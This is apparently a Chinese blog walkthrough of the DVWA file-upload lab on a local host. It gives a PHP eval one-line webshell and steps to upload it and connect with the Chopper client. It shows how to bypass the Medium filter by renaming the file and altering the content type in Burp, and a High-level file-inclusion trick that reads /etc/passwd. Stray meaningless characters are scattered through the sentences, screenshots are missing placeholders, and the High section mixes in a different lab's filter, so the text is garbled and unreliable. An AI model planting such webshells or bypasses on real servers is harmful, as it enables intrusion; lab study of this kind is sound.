- List item
Low
沒有進行任何過濾
在這里插入圖片描述
首相捎泻,上傳一個phpinfo.php,其內代碼如下:
<?php phpinfo(); ?>
上傳路徑:http://127.0.0.1/DVWA-1.9/hackable/uploads/phpinfo.php
然后訪問
在這里插入圖片描述
首先笆豁,寫好
說明存在上傳和執(zhí)行漏洞
上傳一句話木馬:
<?php @eval($_POST[“hack”]); ?>
保存為hack.php
然后上傳
在這里插入圖片描述
找到文件上傳目錄
http://127.0.0.1/DVWA-1.9/hackable/uploads/hack.php
可以直接用hackbar這個插件闯狱,上傳命令抛计,爆出信息
在這里插入圖片描述
使用菜刀連接
在這里插入圖片描述
在這里插入圖片描述
成功
Medium
有過濾
在這里插入圖片描述
使用str_replace函數是極其不安全的瘦陈,因為可以使用雙寫繞過替換規(guī)則。
同時蛾默,因為替換的只是“../”咏花、“..\”阀趴,所以對采用絕對路徑的方式包含文件是不會受到任何限制的。
可以先在上傳一個
此題要求棚菊,需要上傳 .png或 .jpeg格式文件
因此叔汁,我們想到可以更改文件類型据块,然后上傳
直接hack.php擴展名改為hack.png,然后上傳,
在這里插入圖片描述
可以上傳成功像屋,
使用菜刀連接
在這里插入圖片描述
連接不上
制作圖片碼上傳己莺,同樣如此
那么戈轿,可以使用burp抓包修改文件類型看看
在這里插入圖片描述
在這里插入圖片描述
成功
High
其過濾內容為
在這里插入圖片描述
這個if語句的意思是如果page中不含有file并且page不等于include.php服務器才不會去包含相應的文件思杯。兩個條件只要不滿足其中之一就可以色乾,要么page等于include.php,要么page含有file。用file://流訪問本地文件系統(tǒng)
http://127.0.0.1/DVWA-1.9/vulnerabilities/fi/?page=file:///etc/passwd
在這里插入圖片描述
說明存在命令執(zhí)行
上菜刀解虱,結果發(fā)現無聊是如何漆撞,jar版本的死活連不上于宙,使用windows .exe版本的可以悍汛,我也懵逼
在這里插入圖片描述
在這里插入圖片描述